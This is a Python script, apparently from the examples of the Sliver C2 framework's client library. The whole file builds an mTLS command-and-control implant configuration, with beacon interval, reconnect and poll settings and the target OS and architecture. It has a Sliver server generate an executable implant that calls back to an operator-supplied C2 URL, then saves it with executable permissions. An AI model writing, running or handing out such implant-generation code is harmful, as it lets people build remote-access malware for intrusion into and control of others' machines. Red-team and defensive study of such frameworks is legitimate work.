"""Generate an executable implant and save it without overwriting files."""

from __future__ import annotations

import argparse
import asyncio
import platform
from collections.abc import Sequence
from dataclasses import dataclass
from pathlib import Path

from sliver import SliverClient, models

from .common import connected_client

NANOSECOND = 1_000_000_000


def host_target() -> tuple[str, str]:
    """Return the Sliver GOOS/GOARCH names for the current Python host."""

    goos = {
        "darwin": "darwin",
        "linux": "linux",
        "windows": "windows",
    }.get(platform.system().lower())
    goarch = {
        "aarch64": "arm64",
        "amd64": "amd64",
        "arm64": "arm64",
        "i386": "386",
        "i686": "386",
        "x86": "386",
        "x86_64": "amd64",
    }.get(platform.machine().lower())
    if goos is None or goarch is None:
        raise RuntimeError(
            "cannot infer a Sliver target for this host; pass --goos and --goarch"
        )
    return goos, goarch


@dataclass(frozen=True, slots=True)
class GeneratedImplant:
    """The generated Pydantic model and its safely written local path."""

    generated: models.clientpb.Generate
    path: Path


def build_implant_config(
    c2_url: str,
    *,
    goos: str,
    goarch: str,
    is_beacon: bool = False,
) -> models.clientpb.ImplantConfig:
    """Build a public Pydantic implant configuration for mTLS C2."""

    if not c2_url.lower().startswith("mtls://"):
        raise ValueError("c2_url must use the mtls:// scheme")
    return models.clientpb.ImplantConfig(
        is_beacon=is_beacon,
        beacon_interval=5 * NANOSECOND if is_beacon else 0,
        beacon_jitter=0,
        goos=goos,
        goarch=goarch,
        template_name="sliver",
        include_mtls=True,
        c2=[models.clientpb.ImplantC2(priority=0, url=c2_url)],
        connection_strategy="s",
        reconnect_interval=60 * NANOSECOND,
        poll_timeout=360 * NANOSECOND,
        max_connection_errors=1000,
        format=models.clientpb.OutputFormat.EXECUTABLE,
        httpc2_config_name="default",
        net_go_enabled=True,
    )


def save_generated_implant(
    generated: models.clientpb.Generate,
    output: Path | None = None,
) -> Path:
    """Write generated bytes with exclusive creation and return the path."""

    if generated.file is None or not generated.file.data:
        raise RuntimeError("Sliver returned no generated file data")
    filename = Path(generated.file.name).name
    if not filename:
        filename = generated.implant_name
    if not filename:
        raise RuntimeError("Sliver returned no generated file name")

    destination = (output or Path(filename)).expanduser()
    destination.parent.mkdir(parents=True, exist_ok=True)
    with destination.open("xb") as implant_file:
        implant_file.write(generated.file.data)
    destination.chmod(0o700)
    return destination


async def generate_and_save_implant(
    client: SliverClient,
    implant_config: models.clientpb.ImplantConfig,
    *,
    output: Path | None = None,
    timeout: int = 360,
) -> GeneratedImplant:
    """Generate an implant through a connected client and save its bytes."""

    generated = await client.generate_implant(implant_config, timeout=timeout)
    return GeneratedImplant(generated, save_generated_implant(generated, output))


async def _run(args: argparse.Namespace) -> None:
    goos = args.goos
    goarch = args.goarch
    if goos is None or goarch is None:
        inferred_goos, inferred_goarch = host_target()
        goos = goos or inferred_goos
        goarch = goarch or inferred_goarch
    implant_config = build_implant_config(
        args.c2,
        goos=goos,
        goarch=goarch,
        is_beacon=args.beacon,
    )
    async with connected_client(args.config) as client:
        result = await generate_and_save_implant(
            client,
            implant_config,
            output=args.output,
            timeout=args.timeout,
        )
    print(f"Implant name: {result.generated.implant_name}")
    print(f"Saved: {result.path}")
    print(f"Size: {result.path.stat().st_size} bytes")


def main(argv: Sequence[str] | None = None) -> int:
    parser = argparse.ArgumentParser(description=__doc__)
    parser.add_argument("c2", help="mTLS C2 URL, e.g. mtls://127.0.0.1:8888")
    parser.add_argument("--config", help="operator config (or set SLIVER_CONFIG)")
    parser.add_argument("--goos", help="target GOOS (defaults to the current host)")
    parser.add_argument("--goarch", help="target GOARCH (defaults to the current host)")
    parser.add_argument("--beacon", action="store_true")
    parser.add_argument("--output", type=Path)
    parser.add_argument("--timeout", type=int, default=360)
    args = parser.parse_args(argv)
    asyncio.run(_run(args))
    return 0


if __name__ == "__main__":
    raise SystemExit(main())
